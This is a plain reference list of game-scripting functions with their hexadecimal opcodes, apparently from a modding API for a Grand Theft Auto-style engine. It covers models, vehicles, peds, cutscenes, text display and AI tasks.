loadSpecialCharacter(GxtString gxtString, int id) 023C
bool result = hasSpecialCharacterLoaded(int id) 023D
bool result = isPlayerInRemoteMode(Player player) 0241
setCutsceneOffset(float posX, float posY, float posZ) 0244
setAnimGroupForChar(Ped ped, string style) 0245
requestModel(Model modelId) 0247
bool result = hasModelLoaded(Model modelId) 0248
markModelAsNoLongerNeeded(Model modelId) 0249
drawCorona(float atX, float atY, float atZ, float radius, int type, bool lensflares, int r, int g, int b) 024F
storeClock() 0253
restoreClock() 0254
bool result = isPlayerPlaying(Player player) 0256
int mode = getControllerMode() 0293
setCanResprayCar(Vehicle car, bool sprayable) 0294
unloadSpecialCharacter(int id) 0296
resetNumOfModelsKilledByPlayer(Player player) 0297
int quantity = getNumOfModelsKilledByPlayer(Player player, Model modelId) 0298
activateGarage(GxtString garage) 0299
Object object = createObjectNoOffset(Model modelId, float atX, float atY, float atZ) 029B
bool result = isCharStopped(Ped ped) 02A0
switchWidescreen(bool enable) 02A3
Marker marker = addSpriteBlipForContactPoint(float atX, float atY, float atZ, int icon) 02A7
Marker marker = addSpriteBlipForCoord(float atX, float atY, float atZ, int type) 02A8
setCharOnlyDamagedByPlayer(Ped ped, bool enabled) 02A9
setCarOnlyDamagedByPlayer(Vehicle car, bool enabled) 02AA
setCharProofs(Ped ped, bool BP, bool FP, bool EP, bool CP, bool MP) 02AB
setCarProofs(Vehicle car, bool BP, bool FP, bool EP, bool CP, bool MP) 02AC
deactivateGarage(GxtString garage) 02B9
bool result = isCarInWater(Vehicle car) 02BF
float nodeX, float nodeY, float nodeZ = getClosestCharNode(float closestToX, float closestToY, float closestToZ) 02C0
float nodeX, float nodeY, float nodeZ = getClosestCarNode(float closestToX, float closestToY, float closestToZ) 02C1
carGotoCoordinatesAccurate(Vehicle car, float toX, float toY, float toZ) 02C2
bool result = isCarOnScreen(Vehicle car) 02CA
bool result = isCharOnScreen(Ped ped) 02CB
bool result = isObjectOnScreen(Object object) 02CC
float z = getGroundZFor3dCoord(float atX, float atY, float atZ) 02CE
int fire = startScriptFire(float atX, float atY, float atZ, int propagation, int size) 02CF
bool result = isScriptFireExtinguished(int fire) 02D0
removeScriptFire(int fire) 02D1
boatGotoCoords(Vehicle boat, float toX, float toY, float toZ) 02D3
boatStop(Vehicle car) 02D4
bool result = isCharShootingInArea(Ped ped, float cornerAX, float cornerAY, float cornerBX, float cornerBY, int weapon) 02D6
bool result = isCurrentCharWeapon(Ped ped, int weapon) 02D8
setBoatCruiseSpeed(Vehicle boat, float speed) 02DB
Ped ped = getRandomCharInZone(GxtString zone, bool pedtype, bool gang, bool criminal_prostitute) 02DD
bool result = isCharShooting(Ped ped) 02E0
Pickup pickup = createMoneyPickup(float atX, float atY, float atZ, int cash, bool permanenceFlag) 02E1
setCharAccuracy(Ped ped, int accuracy) 02E2
float speed = getCarSpeed(Vehicle car) 02E3
loadCutscene(GxtString cutscene) 02E4
Object object = createCutsceneObject(Model modelId) 02E5
setCutsceneAnim(int cutscene, GxtString anim) 02E6
startCutscene() 02E7
int time = getCutsceneTime() 02E8
bool result = hasCutsceneFinished() 02E9
clearCutscene() 02EA
restoreCameraJumpcut() 02EB
setCollectable1Total(int total) 02ED
bool result = isProjectileInArea(float cornerAX, float cornerAY, float cornerAZ, float cornerBX, float cornerBY, float cornerBZ) 02EE
bool result = isCharModel(Ped ped, Model modelId) 02F2
loadSpecialModel(Model modelId, GxtString gxtString) 02F3
float forwardX = getCarForwardX(Vehicle car) 02F8
float forwardY = getCarForwardY(Vehicle car) 02F9
changeGarageType(GxtString garage, int type) 02FA
printWith2NumbersNow(GxtString gxtString, int numbers1, int numbers2, int time, int flag) 02FD
printWith3Numbers(GxtString gxtString, int numbers1, int numbers2, int numbers3, int time, int flag) 02FF
printWith4Numbers(GxtString gxtString, int numbers1, int numbers2, int numbers3, int numbers4, int time, int flag) 0302
printWith4NumbersNow(GxtString gxtString, int numbers1, int numbers2, int numbers3, int numbers4, int time, int flag) 0303
printWith6Numbers(GxtString gxtString, int numbers1, int numbers2, int numbers3, int numbers4, int numbers5, int numbers6, int time, int flag) 0308
playerMadeProgress(int progress) 030C
setProgressTotal(int maxProgress) 030D
registerMissionGiven() 0317
registerMissionPassed(GxtString mission) 0318
removeAllScriptFires() 031A
bool result = hasCharBeenDamagedByWeapon(Ped ped, int weapon) 031D
bool result = hasCarBeenDamagedByWeapon(Vehicle car, int weapon) 031E
explodeCharHead(Ped ped) 0321
anchorBoat(Vehicle boat, bool anchor) 0323
int fire = startCarFire(Vehicle car) 0325
int fire = startCharFire(Ped ped) 0326
Vehicle car = getRandomCarOfTypeInArea(float cornerAX, float cornerAY, float cornerBX, float cornerBY, Model modelId) 0327
bool result = hasResprayHappened(Vehicle car) 0329
setCameraZoom(int mode) 032A
Pickup pickup = createPickupWithAmmo(Model modelId, int type, int ammo, float atX, float atY, float atZ) 032B
setCarRamCar(Vehicle car, Vehicle car) 032C
setPlayerNeverGetsTired(Player player, bool infiniteRun) 0330
setPlayerFastReload(Player player, bool fastReload) 0331
setCharBleeding(Ped ped, bool bleeding) 0332
setFreeResprays(bool enable) 0335
setCharVisible(Ped ped, bool visible) 0337
setCarVisible(Vehicle car, bool visible) 0338
bool result = isAreaOccupied(float cornerAX, float cornerAY, float cornerAZ, float cornerBX, float cornerBY, float cornerBZ, bool solid, bool car, bool actor, bool object, bool particle) 0339
displayText(float posX, float posY, GxtString gxtString) 033E
setTextScale(float sizeX, float sizeY) 033F
setTextColour(int r, int g, int b, int a) 0340
setTextJustify(bool alignJustify) 0341
setTextCentre(bool centered) 0342
setTextWrapx(float linewidth) 0343
setTextCentreSize(float linewidth) 0344
setTextBackground(bool background) 0345
setTextProportional(bool proportional) 0348
setTextFont(int font) 0349
bool result = rotateObject(Object object, float fromAngle, float toAngle, bool flag) 034D
bool result = slideObject(Object object, float toX, float toY, float toZ, float speedX, float speedY, float speedZ, bool collisionCheck) 034E
removeCharElegantly(Ped ped) 034F
setCharStayInSamePlace(Ped ped, bool enabled) 0350
bool result = isExplosionInArea(int explosionType, float cornerAX, float cornerAY, float cornerAZ, float cornerBX, float cornerBY, float cornerBZ) 0356
placeObjectRelativeToCar(Object object, Vehicle car, float offsetX, float offsetY, float offsetZ) 035C
makeObjectTargettable(Object object, bool targetable) 035D
addArmourToChar(Ped ped, int points) 035F
openGarage(GxtString garage) 0360
closeGarage(GxtString garage) 0361
warpCharFromCarToCoord(Ped ped, float placeAtX, float placeAtY, float placeAtZ) 0362
setVisibilityOfClosestObjectOfType(float atX, float atY, float atZ, float radius, Model modelId, bool visibility) 0363
bool result = hasCharSpottedChar(Ped ped, Ped ped) 0364
bool result = hasObjectBeenDamaged(Object object) 0366
warpCharIntoCar(Ped ped, Vehicle car) 036A
printWith2NumbersBig(GxtString gxtString, int numbers1, int numbers2, int time, int style) 036D
setCameraBehindPlayer() 0373
Ped ped = createRandomChar(float atX, float atY, float atZ) 0376
bool result = isSniperBulletInArea(float float1, float float2, float float3, float float4, float float5, float float6) 037E
setObjectVelocity(Object object, float velocityInDirectionX, float velocityInDirectionY, float velocityInDirectionZ) 0381
setObjectCollision(Object object, bool collision) 0382
printStringInStringNow(GxtString gxtString, GxtString string, int time1, int time2) 0384
bool result = isPointObscuredByAMissionEntity(float cornerAX, float cornerAY, float cornerAZ, float cornerBX, float cornerBY, float cornerBZ) 038A
loadAllModelsNow() 038B
addToObjectVelocity(Object object, float velocityX, float velocityY, float velocityZ) 038C
drawSprite(int texture, float positionX, float positionY, float width, float height, int r, int g, int b, int a) 038D
drawRect(float positionX, float positionY, float width, float height, int r, int g, int b, int a) 038E
int id = loadSprite(string name) 038F
bool result = loadTextureDictionary(zstring txd) 0390
removeTextureDictionary() 0391
setObjectDynamic(Object object, bool moveable) 0392
setCharAnimSpeed(Ped ped, string animation, float speed) 0393
playMissionPassedTune(int music) 0394
clearArea(float atX, float atY, float atZ, float radius, bool area) 0395
freezeOnscreenTimer(bool timer) 0396
switchCarSiren(Vehicle car, bool siren) 0397
setCarWatertight(Vehicle car, bool watertight) 039C
setCharCantBeDraggedOut(Ped ped, bool locked) 039E
turnCarToFaceCoord(Vehicle car, float coordX, float coordY) 039F
drawSphere(float atX, float atY, float atZ, float radius) 03A1
setCarStatus(Vehicle car, int action) 03A2
bool result = isCharMale(Ped ped) 03A3
policeRadioMessage(float float1, float float2, float float3) 03AA
setCarStrong(Vehicle car, bool strong) 03AB
switchRubbish(bool int1) 03AD
switchStreaming(bool streaming) 03AF
bool result = isGarageOpen(GxtString garage) 03B0
bool result = isGarageClosed(GxtString garage) 03B1
swapNearestBuildingModel(float atX, float atY, float atZ, float radius, Model from, Model to) 03B6
switchWorldProcessing(bool cutsceneOnly) 03B7
clearAreaOfCars(float cornerAX, float cornerAY, float cornerAZ, float cornerBX, float cornerBY, float cornerBZ) 03BA
int sphere = addSphere(float atX, float atY, float atZ, float radius) 03BC
removeSphere(int sphere) 03BD
setEveryoneIgnorePlayer(Player player, bool ignored) 03BF
Vehicle car = storeCarCharIsInNoSave(Ped ped) 03C0
displayOnscreenTimerWithString(VarId timer, int type, GxtString gxtString) 03C3
displayOnscreenCounterWithString(VarId var, bool type, GxtString gxtString) 03C4
createRandomCarForCarPark(float coordsX, float coordsY, float coordsZ, float zAngle) 03C5
setWantedMultiplier(float sensitivity) 03C7
setCameraInFrontOfPlayer() 03C8
bool result = isCarVisiblyDamaged(Vehicle car) 03C9
bool result = doesObjectExist(Object object) 03CA
loadScene(float atX, float atY, float atZ) 03CB
addStuckCarCheck(Vehicle car, float stuckCheckDistance, int time) 03CC
removeStuckCarCheck(Vehicle car) 03CD
bool result = isCarStuck(Vehicle car) 03CE
loadMissionAudio(int asId, int name) 03CF
bool result = hasMissionAudioLoaded(int id) 03D0
playMissionAudio(int id) 03D1
bool result = hasMissionAudioFinished(int id) 03D2
float nodeX, float nodeY, float nodeZ, float angle = getClosestCarNodeWithHeading(float X, float Y, float Z) 03D3
bool result = hasImportGarageSlotBeenFilled(int int1, int int2) 03D4
clearThisPrint(GxtString text) 03D5
clearThisBigPrint(GxtString text) 03D6
setMissionAudioPosition(int id, float locationX, float locationY, float locationZ) 03D7
activateSaveMenu() 03D8
bool result = hasSaveGameFinished() 03D9
noSpecialCameraForThisGarage(int int1) 03DA
Marker marker = addBlipForPickup(Pickup pickup) 03DC
setPedDensityMultiplier(float multiplier) 03DE
setTextDrawBeforeFade(bool int1) 03E0
int collected = getCollectable1sCollected() 03E1
setSpritesDrawBeforeFade(bool antialiased) 03E3
setTextRightJustify(bool alignRight) 03E4
printHelp(GxtString gxtString) 03E5
clearHelp() 03E6
flashHudObject(int hudComponent) 03E7
setGenerateCarsAroundCamera(bool int1) 03EA
clearSmallPrints() 03EB
setUpsidedownCarNotDamaged(Vehicle car, bool disableFlippedExplosion) 03ED
bool result = isPlayerControllable(Player player) 03EE
makePlayerSafe(Player player) 03EF
int primaryColor, int secondaryColor = getCarColours(Vehicle car) 03F3
setAllCarsCanBeDamaged(bool enable) 03F4
setCarCanBeDamaged(Vehicle car, bool enable) 03F5
setDrunkInputDelay(Player player, int handlingResponsiveness) 03FD
setCharMoney(Ped ped, int money) 03FE
float X, float Y, float Z = getOffsetFromObjectInWorldCoords(Object object, float offsetX, float offsetY, float offsetZ) 0400
float X, float Y, float Z = getOffsetFromCarInWorldCoords(Vehicle car, float offsetX, float offsetY, float offsetZ) 0407
clearMissionAudio(int id) 040D
setFreeHealthCare(Player player, bool free) 0414
loadAndLaunchMissionInternal(int mission) 0417
setObjectDrawLast(Object object, bool drawLast) 0418
int ammo = getAmmoInCharWeapon(Ped ped, int int) 041A
setNearClip(float clip) 041D
setRadioChannel(int radioStation) 041E
setCarTraction(Vehicle car, float traction) 0423
bool result = areMeasurementsInMetres() 0424
float feet = convertMetresToFeet(float meters) 0425
setCarAvoidLevelTransitions(Vehicle car, bool avoidLevelTransitions) 0428
clearAreaOfChars(float cornerAX, float cornerAY, float cornerAZ, float cornerBX, float cornerBY, float cornerBZ) 042B
setTotalNumberOfMissions(int totalMissions) 042C
int imperial = convertMetresToFeetInt(int metric) 042D
registerFastestTime(int stat, int to) 042E
registerHighestScore(int int1, int int2) 042F
warpCharIntoCarAsPassenger(Ped ped, Vehicle car, int passengerSeat) 0430
bool result = isCarPassengerSeatFree(Vehicle car, int seat) 0431
Ped ped = getCharInCarPassengerSeat(Vehicle car, int seat) 0432
setCharIsChrisCriminal(Ped ped, bool flag) 0433
startCredits() 0434
stopCredits() 0435
bool result = areCreditsFinished() 0436
setMusicDoesFade(bool enable) 043C
Model modelId = getCarModel(Vehicle veh) 0441
bool result = areAnyCarCheatsActivated() 0445
setCharSuffersCriticalHits(Ped ped, bool enable) 0446
bool result = isCharSittingInCar(Ped ped, Vehicle car) 0448
bool result = isCharSittingInAnyCar(Ped ped) 0449
bool result = isCharOnFoot(Ped ped) 044B
loadSplashScreen(GxtString gxtString) 044D
setJamesCarOnPathToPlayer(int int1) 0450
setObjectRotation(Object object, float rotationX, float rotationY, float rotationZ) 0453
float X, float Y, float Z = getDebugCameraCoordinates() 0454
bool result = isPlayerTargettingChar(Player player, Ped ped) 0457
bool result = isPlayerTargettingObject(Player player, Object object) 0458
displayTextWithNumber(float x, float y, GxtString gxtString, int number) 045A
displayTextWith2Numbers(float x, float y, GxtString gxtString, int numbersX, int numbersY) 045B
failCurrentMission() 045C
setInterpolationParameters(float delay, int time) 0460
float X, float Y, float Z = getDebugCameraPointAt() 0463
attachCharToCar(Ped ped, Vehicle car, float offsetX, float offsetY, float offsetZ, int position, float shootingAngleLimit, int weapon) 0464
detachCharFromCar(Ped ped) 0465
setCarStayInFastLane(Vehicle car, bool flag) 0466
clearCharLastWeaponDamage(Ped ped) 0467
clearCarLastWeaponDamage(Vehicle car) 0468
int int10 = getRandomCopInArea(float float1, float float2, float float3, float float4, bool int5, bool int6, bool int7, bool int8, bool int9) 0469
Ped ped = getDriverOfCar(Vehicle car) 046C
int followers = getNumberOfFollowers(Ped ped) 046D
giveRemoteControlledModelToPlayer(Player player, float atX, float atY, float atZ, float angle, Model RCModel) 046E
int weapon = getCurrentCharWeapon(Ped ped) 0470
bool result = locateCharAnyMeansObject2d(Ped ped, Object object, float radiusX, float radiusY, bool sphere) 0471
bool result = locateCharOnFootObject2d(Ped ped, Object object, float radiusX, float radiusY, bool sphere) 0472
bool result = locateCharInCarObject2d(Ped ped, Object object, float radiusX, float radiusY, bool sphere) 0473
bool result = locateCharAnyMeansObject3d(Ped ped, Object object, float radiusX, float radiusY, float radiusZ, bool sphere) 0474
bool result = locateCharOnFootObject3d(Ped ped, Object object, float radiusX, float radiusY, float radiusZ, bool sphere) 0475
bool result = locateCharInCarObject3d(Ped ped, Object object, float radiusX, float radiusY, float radiusZ, bool sphere) 0476
setCarTempAction(Vehicle car, int action, int time) 0477
bool result = isCharOnAnyBike(Ped ped) 047A
bool result = canCharSeeDeadChar(Ped ped, int pedtype) 0480
setEnterCarRangeMultiplier(float float1) 0481
Vehicle car = getRemoteControlledCar(Player player) 0484
bool result = isPcVersion() 0485
bool result = isModelAvailable(Model modelId) 0488
shutCharUp(Ped ped, bool muted) 0489
setEnableRcDetonate(bool detonation) 048A
setCarRandomRouteSeed(Vehicle car, int routeSeed) 048B
bool result = isAnyPickupAtCoords(float pickupX, float pickupY, float pickupZ) 048C
removeAllCharWeapons(Ped ped) 048F
bool result = hasCharGotWeapon(Ped ped, int weapon) 0491
setTankDetonateCars(int tank, bool detonate) 0493
int offset1, int offset2, int offset3, int offset4 = getPositionOfAnalogueSticks(int joystick) 0494
bool result = isCarOnFire(Vehicle car) 0495
bool result = isCarTireBurst(Vehicle car, int tire) 0496
initialiseObjectPath(int int1, float float2) 049C
setObjectPathSpeed(int int1, int int2) 049E
setObjectPathPosition(int int1, float float2) 049F
clearObjectPath(int int1) 04A1
heliGotoCoords(Vehicle heli, float toX, float toY, float toZ, float altitudeMin, float altitudeMax) 04A2
float coordsX, float coordsY, float coordsZ = getDeadCharPickupCoords(Ped ped) 04A5
Pickup pickup = createProtectionPickup(float atX, float atY, float atZ, int int4, int int5) 04A6
bool result = isCharInAnyBoat(Ped ped) 04A7
bool result = isCharInAnyHeli(Ped ped) 04A9
bool result = isCharInAnyPlane(Ped ped) 04AB
bool result = isCharInWater(Ped ped) 04AD
int weapon, int ammo, Model modelId = getCharWeaponInSlot(Ped ped, int slot) 04B8
float float6, float float7, float float8, float float9, float float10, float float11, float float12 = getClosestStraightRoad(float atX, float atY, float atZ, float height, float radius) 04B9
setCarForwardSpeed(Vehicle car, float speed) 04BA
setInteriorVisible(int interior) 04BB
markCarAsConvoyCar(Vehicle car, bool convoy) 04BD
resetHavocCausedByPlayer(int int1) 04BE
int int2 = getHavocCausedByPlayer(int int1) 04BF
createScriptRoadblock(float cornerAX, float cornerAY, float cornerAZ, float cornerBX, float cornerBY, float cornerBZ, int type) 04C0
clearAllScriptRoadblocks() 04C1
float X, float Y, float Z = getOffsetFromCharInWorldCoords(Ped ped, float offsetX, float offsetY, float offsetZ) 04C4
bool result = hasCharBeenPhotographed(Ped ped) 04C5
switchSecurityCamera(bool int1) 04C7
bool result = isCharInFlyingVehicle(Ped ped) 04C8
Marker marker = addShortRangeSpriteBlipForCoord(float atX, float atY, float atZ, int icon) 04CE
setHeliOrientation(Vehicle heli, float angle) 04D0
clearHeliOrientation(Vehicle heli) 04D1
planeGotoCoords(int plane, float X, float Y, float Z, float z1, float z2) 04D2
float X, float Y, float Z = getNthClosestCarNode(float X, float Y, float Z, int type) 04D3
drawWeaponshopCorona(float X, float Y, float Z, float radius, int type, int flare, int r, int g, int b) 04D5
setEnableRcDetonateOnContact(bool enable) 04D6
freezeCharPosition(Ped ped, bool locked) 04D7
setCharDrownsInWater(Ped ped, bool drowns) 04D8
setObjectRecordsCollisions(Object object, bool set) 04D9
bool result = hasObjectCollidedWithAnything(Object object) 04DA
removeRcBuggy() 04DB
int armour = getCharArmour(Ped ped) 04DD
setHeliStabiliser(Vehicle heli, bool limiter) 04DF
setCarStraightLineDistance(Vehicle car, int radius) 04E0
popCarBoot(Vehicle car) 04E1
shutPlayerUp(Player player, bool shut) 04E2
setPlayerMood(Player player, int flag, int time) 04E3
requestCollision(float X, float Y) 04E4
bool result = locateObject2d(Object object, float X, float Y, float radiusX, float radiusY, bool sphere) 04E5
bool result = locateObject3d(Object object, float X, float Y, float Z, float radiusX, float radiusY, float radiusZ, bool flag) 04E6
bool result = isObjectInWater(Object object) 04E7
bool result = isObjectInArea2d(Object object, float cornerAX, float cornerAY, float cornerBX, float cornerBY, bool sphere) 04E9
bool result = isObjectInArea3d(Object object, float cornerAX, float cornerAY, float cornerAZ, float cornerBX, float cornerBY, float cornerBZ, bool flag) 04EA
taskToggleDuck(Ped ped, bool crouch) 04EB
requestAnimation(string animation) 04ED
bool result = hasAnimationLoaded(string animation) 04EE
removeAnimation(string animation) 04EF
bool result = isCharWaitingForWorldCollision(Ped ped) 04F0
bool result = isCarWaitingForWorldCollision(Vehicle car) 04F1
attachCharToObject(Ped ped, Object object, float offsetX, float offsetY, float offsetZ, int orientation, float angle, int lockWeapon) 04F4
displayNthOnscreenCounterWithString(VarId text, int type, int line, GxtString gxtString) 04F7
addSetPiece(int type, float rectX1, float rectY1, float rectX2, float rectY2, float spawnAX, float spawnAY, float headedTowards1X, float headedTowards1Y, float spawnBX, float spawnBY, float headedTowards2X, float headedTowards2Y) 04F8
setExtraColours(int color, bool fade) 04F9
clearExtraColours(bool fade) 04FA
int twowheelstime, float twowheelsdistance, int wheelietime, float wheelieDistance, int stoppieTime, float stoppieDistance = getWheelieStats(Player player) 04FC
burstCarTire(Vehicle car, int tire) 04FE
bool result = isPlayerWearing(Player player, string bodypart, int skin) 0500
setPlayerCanDoDriveBy(Player player, bool mode) 0501
int handleAs = createSwatRope(int pedtype, Model modelId, float X, float Y, float Z) 0503
setCarModelComponents(Model car, int variation1, int variation2) 0506
closeAllCarDoors(Vehicle car) 0508
float distance = getDistanceBetweenCoords2d(float x1, float y1, float x2, float y2) 0509
float distance = getDistanceBetweenCoords3d(float x1, float y1, float z1, float x2, float y2, float z2) 050A
sortOutObjectCollisionWithCar(Object object, Vehicle car) 050E
int level = getMaxWantedLevel() 050F
printHelpForever(GxtString text) 0512
printHelpForeverWithNumber(GxtString text, int number) 0513
Pickup pickup = createLockedPropertyPickup(float pX, float pY, float pZ, GxtString gxtString) 0517
Pickup pickup = createForsalePropertyPickup(float pX, float pY, float pZ, int price, GxtString gxtString) 0518
freezeCarPosition(Vehicle car, bool locked) 0519
bool result = hasCharBeenDamagedByChar(Ped ped, Ped byActor) 051A
bool result = hasCharBeenDamagedByCar(Ped ped, Vehicle byCar) 051B
bool result = hasCarBeenDamagedByChar(Vehicle car, Ped byActor) 051C
bool result = hasCarBeenDamagedByCar(Vehicle car, Vehicle byCar) 051D
int radio = getRadioChannel() 051E
setCharStayInCarWhenJacked(Ped ped, bool stay) 0526
setPlayerDrunkenness(Player player, int drunk) 052C
Vehicle car = getRandomCarOfTypeInAreaNoSave(float x1, float y1, float x2, float y2, Model modelId) 053E
setCanBurstCarTires(Vehicle car, bool vulnerability) 053F
fireHunterGun(Vehicle car) 0541
bool result = isCharTouchingVehicle(Ped ped, Vehicle car) 0547
setCharCanBeShotInVehicle(Ped ped, bool can) 054A
loadMissionText(GxtString table) 054C
clearCharLastDamageEntity(Ped ped) 054E
clearCarLastDamageEntity(Vehicle car) 054F
freezeObjectPosition(Object object, bool freeze) 0550
removeWeaponFromChar(Ped ped, int weapon) 0555
makePlayerFireProof(Player player, bool fireproof) 055D
increasePlayerMaxHealth(Player player, int increase) 055E
increasePlayerMaxArmour(Player player, int increase) 055F
Ped ped = createRandomCharAsDriver(Vehicle car) 0560
Ped ped = createRandomCharAsPassenger(Vehicle car, int seat) 0561
ensurePlayerHasDriveByWeapon(Player player, int ammo) 0563
makeHeliComeCrashingDown(Vehicle heli) 0564
addExplosionNoSound(float pX, float pY, float pZ, int type) 0565
linkObjectToInterior(Object object, int interior) 0566
setCharNeverTargetted(Ped ped, bool untargetable) 0568
bool result = wasCutsceneSkipped() 056A
bool result = isCharInAnyPoliceVehicle(Ped ped) 056C
bool result = doesCharExist(Ped ped) 056D
bool result = doesVehicleExist(Vehicle car) 056E
Marker blip = addShortRangeSpriteBlipForContactPoint(float pX, float pY, float pZ, int icon) 0570
setAllTaxisHaveNitro(bool toggle) 0572
freezeCarPositionAndDontLoadCollision(Vehicle car, bool keep) 0574
freezeCharPositionAndDontLoadCollision(Ped ped, bool keep) 0575
setPlayerIsInStadium(bool set) 057E
displayRadar(bool enable) 0581
registerBestPosition(int stat, float float) 0582
bool result = isPlayerInInfoZone(Player player, GxtString zone) 0583
setLoadCollisionForCarFlag(Vehicle car, bool enable) 0587
setLoadCollisionForCharFlag(Ped ped, bool enable) 0588
addBigGunFlash(float fromX, float fromY, float fromZ, float toX, float toY, float toZ) 058A
float progress = getProgressPercentage() 058C
setVehicleToFadeIn(Vehicle car, int flag) 0594
registerOddjobMissionPassed() 0595
bool result = isPlayerInShortcutTaxi(Player player) 0596
bool result = isCharDucking(Ped ped) 0597
setOnscreenCounterFlashWhenFirstDisplayed(VarId text, bool flashing) 059C
shuffleCardDecks(bool shuffle) 059D
int card = fetchNextCard() 059E
float vecX, float vecY, float vecZ = getObjectVelocity(Object object) 059F
bool result = isDebugCameraOn() 05A0
addToObjectRotationVelocity(Object object, float vecX, float vecY, float vecZ) 05A1
setObjectRotationVelocity(Object object, float vecX, float vecY, float vecZ) 05A2
bool result = isObjectStatic(Object object) 05A3
float angle = getAngleBetween2dVectors(float vecX, float vecY, float vecX, float vecY) 05A4
bool result = do2dRectanglesCollide(float areaX, float areaY, float scaleX, float scaleY, float overlapareaX, float overlapareaY, float overlapscaleX, float overlapscaleY) 05A5
float axisX, float axisY, float axisZ = getObjectRotationVelocity(Object object) 05A6
addVelocityRelativeToObjectVelocity(Object object, float vecX, float vecY, float vecZ) 05A7
float speed = getObjectSpeed(Object object) 05A8
bool result, float X, float Y = get2dLinesIntersectPoint(float l1x1, float l1y1, float l1x2, float l1y2, float l2x1, float l2y1, float l2x2, float l2y2) 05B0
taskPause(Ped ped, int timeMS) 05B9
taskStandStill(Ped ped, int timeMS) 05BA
taskFallAndGetUp(Ped ped, bool int2, int time) 05BB
taskJump(Ped ped, bool jump) 05BC
taskTired(Ped ped, int timeMS) 05BD
taskDie(Ped ped) 05BE
taskLookAtChar(Ped ped, int lookAt, int timeMS) 05BF
taskLookAtVehicle(Ped ped, int lookAt, int timeMS) 05C0
taskSay(Ped ped, int audio) 05C1
taskShakeFist(Ped ped) 05C2
taskCower(Ped ped) 05C3
taskHandsUp(Ped ped, int timeMS) 05C4
taskDuck(Ped ped, int timeMS) 05C5
taskUseAtm(Ped ped) 05C7
taskScratchHead(Ped ped) 05C8
taskLookAbout(Ped ped, int timeMS) 05C9
taskEnterCarAsPassenger(Ped ped, Vehicle car, int time, int passengerSeat) 05CA
taskEnterCarAsDriver(Ped ped, Vehicle car, int timeMS) 05CB
taskLeaveCar(Ped ped, Vehicle car) 05CD
taskLeaveCarAndFlee(Ped ped, Vehicle car, float X, float Y, float Z) 05CF
taskCarDriveToCoord(Ped ped, Vehicle car, float toX, float toY, float toZ, float speed, int int7, int model, int int9) 05D1
taskCarDriveWander(Ped ped, Vehicle hijackCar, float searchRadius, int trafficBehavior) 05D2
taskGoStraightToCoord(Ped ped, float toX, float toY, float toZ, int mode, int time) 05D3
taskAchieveHeading(Ped ped, float angle) 05D4
flushRoute() 05D6
extendRoute(float pointX, float pointY, float pointZ) 05D7
taskFollowPointRoute(Ped ped, int flags1, int flags2) 05D8
taskGotoChar(Ped ped, Ped toActor, int timelimit, float stopWithinRadius) 05D9
taskFleePoint(Ped ped, float fromX, float fromY, float fromZ, float awayRadius, int timelimit) 05DA
taskFleeChar(Ped ped, Ped fromActor, float radius, int timelimit) 05DB
taskSmartFleePoint(Ped ped, float fromX, float fromY, float fromZ, float stopAtRadius, int timelimit) 05DC
taskSmartFleeChar(Ped ped, Ped fromActor, float originRadius, int timelimit) 05DD
taskWanderStandard(Ped ped) 05DE
taskKillCharOnFoot(Ped ped, Ped killActor) 05E2
startPlaybackRecordedCar(Vehicle car, int path) 05EB
stopPlaybackRecordedCar(Vehicle car) 05EC
pausePlaybackRecordedCar(Vehicle car) 05ED
unpausePlaybackRecordedCar(Vehicle car) 05EE
setCarEscortCarLeft(Vehicle car, Vehicle followCar) 05F1
setCarEscortCarRight(Vehicle car, Vehicle followCar) 05F2
setCarEscortCarRear(Vehicle car, Vehicle followCar) 05F3
setCarEscortCarFront(Vehicle car, Vehicle followCar) 05F4
taskFollowPathNodesToCoord(Ped ped, float pathX, float pathY, float pathZ, int mode, int time) 05F5
bool result = isCharInAngledArea2d(Ped ped, float x1, float y1, float x2, float y2, float angle, bool sphere) 05F6
bool result = isCharInAngledAreaOnFoot2d(Ped ped, float x1, float y1, float x2, float y2, float angle, bool sphere) 05F7
bool result = isCharInAngledAreaInCar2d(Ped ped, float x1, float y1, float x2, float y2, float angle, bool sphere) 05F8
bool result = isCharStoppedInAngledArea2d(Ped ped, float x1, float y1, float x2, float y2, float height, bool flag) 05F9
bool result = isCharStoppedInAngledAreaOnFoot2d(Ped ped, float x1, float y1, float x2, float y2, float angle, bool sphere) 05FA
bool result = isCharStoppedInAngledAreaInCar2d(Ped ped, float x1, float y1, float x2, float y2, float height, bool flag) 05FB
bool result = isCharInAngledArea3d(Ped ped, float x1, float y1, float z1, float x2, float y2, float z2, float angle, bool sphere) 05FC
bool result = isCharInAngledAreaOnFoot3d(Ped ped, float x1, float y1, float z1, float x2, float y2, float z2, float angle, bool sphere) 05FD
bool result = isCharInAngledAreaInCar3d(Ped ped, float x1, float y1, float z1, float x2, float y2, float z2, float depth, bool flag) 05FE
bool result = isCharStoppedInAngledArea3d(Ped ped, float x1, float y1, float z1, float x2, float y2, float z2, float depth, bool flag) 05FF
bool result = isCharStoppedInAngledAreaOnFoot3d(Ped ped, float x1, float y1, float z1, float x2, float y2, float z2, float depth, bool flag) 0600
bool result = isCharStoppedInAngledAreaInCar3d(Ped ped, float x1, float y1, float z1, float x2, float y2, float z2, float depth, bool flag) 0601
bool result = isCharInTaxi(Ped ped) 0602
taskGoToCoordAnyMeans(Ped ped, float toX, float toY, float toZ, int mode, Vehicle useCar) 0603
float zAngle = getHeadingFromVector2d(float pX, float pY) 0604
taskPlayAnim(Ped ped, string animation, string IFP, float framedelta, bool loop, bool lockX, bool lockY, bool lockF, int time) 0605
loadPathNodesInArea(float x1, float y1, float x2, float y2) 0606
releasePathNodes() 0607
int maker = loadCharDecisionMaker(int type) 060A
setCharDecisionMaker(Ped ped, int maker) 060B
setTextDropshadow(int shadow, int r, int g, int b, int a) 060D
bool result = isPlaybackGoingOnForCar(Vehicle car) 060E
setSenseRange(Ped ped, float accuracy) 060F
bool result = isCharPlayingAnim(Ped ped, string animation) 0611
setCharAnimPlayingFlag(Ped ped, string animation, bool flag) 0612
float time = getCharAnimCurrentTime(Ped ped, string animation) 0613
setCharAnimCurrentTime(Ped ped, string animation, float time) 0614
int task = openSequenceTask() 0615
closeSequenceTask(int task) 0616
performSequenceTask(Ped ped, int task) 0618
setCharCollision(Ped ped, bool enable) 0619
float totalTime = getCharAnimTotalTime(Ped ped, string animation) 061A
clearSequenceTask(int task) 061B
int handle = addAttractor(float originX, float originY, float originZ, float zAngle, float unknownAngle, int taskSequence) 061D
clearAttractor(int handle) 061E
Ped ped = createCharAtAttractor(int pedtype, Model modelId, int ASOrigin, int task) 0621
taskLeaveCarImmediately(Ped ped, Vehicle car) 0622
